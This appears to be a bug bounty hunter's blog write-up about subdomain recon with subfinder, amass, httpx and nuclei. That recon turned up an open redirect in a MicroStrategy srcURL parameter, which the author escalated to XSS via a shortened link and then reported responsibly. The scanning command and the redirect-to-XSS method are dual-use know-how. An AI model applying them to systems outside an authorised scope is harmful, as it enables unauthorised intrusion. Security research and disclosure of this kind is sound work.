How recon helped me to find an interesting bug…
Hello infosec community! I’m back again to share an interesting finding with you. Little bit about me, my name is Vedant and I’m a bug bounty hunter/ethical hacker for about 4 months now. And I love what I do. So back in July I decided that in August I’ll focus solely on “Recon”. I always wanted to up my recon game. On 1st August I rented a VPS and started to install some Recon tools. I installed all the necessary tools for subdomain enumeration, content discovery, parameter discovery etc.
Enough of the backstory, lets understand the bug.
Recon phase:-
One day I started looking for some responsible disclosure programs and got a program. The program had *.target.com in scope so I decided to do some recon on the target. First I enumerated all the subdomains using subfinder and amass and combined the output of both tools. Then I used another tool called as httpx for probing and saved the output in a txt file. After that I used a tool created by projectdiscovery team called as nuclei and I used the following command,
cat final.txt | nuclei -t path/to/nuclei-templates/vulnerabilities -o results.txt
Discovery phase:-
After some time I got some results and there was a subdomain vulnerable to microstrategy ssrf and the URL was as following,
At first I tried for an open redirect by changing srcURL parameter to bing.com but it wasn’t redirecting. Then I tried for SSRF and again it wasn’t working. I thought its just a false positive.
Then after some time I just googled for the word Microstrategy and got to know that it is some kind of company which provides cloud based services. So just for curiosity’s sake I searched for “Microstrategy vulnerability” and after some time I got link to a medium blog which was about a SSRF vulnerability and in that blog there was exact same url that I found! So I read the blog and understood that srcURL parameter only takes tiny URLs and that’s why it wasn’t redirecting me. So I made a tiny url for https://bing.com and put it in srcURL parameter and it redirected me to bing.com! I tried for SSRF but there wasn’t a SSRF because site was redirecting me and it wasn’t fetching data from external url. To increase the impact I looked for a XSS hosted page and after some time I got it and made its tiny url and again pasted it into srcURL parameter and the XSS executed successfully! I was very happy.
I quickly wrote a good report and sent it to the company. After 4–5 days I received a response from them saying “Thanks for reporting this issue” and they rewarded by adding me to their security researcher’s “Hall of fame”.
Even though I didn’t get any bounty for reporting this issue, I learned some new things and most importantly I learned the power of “Recon”.
If you have any doubts regarding this write up you can reach me here.
Hope you liked this finding. Stay home, stay safe. Thank you!
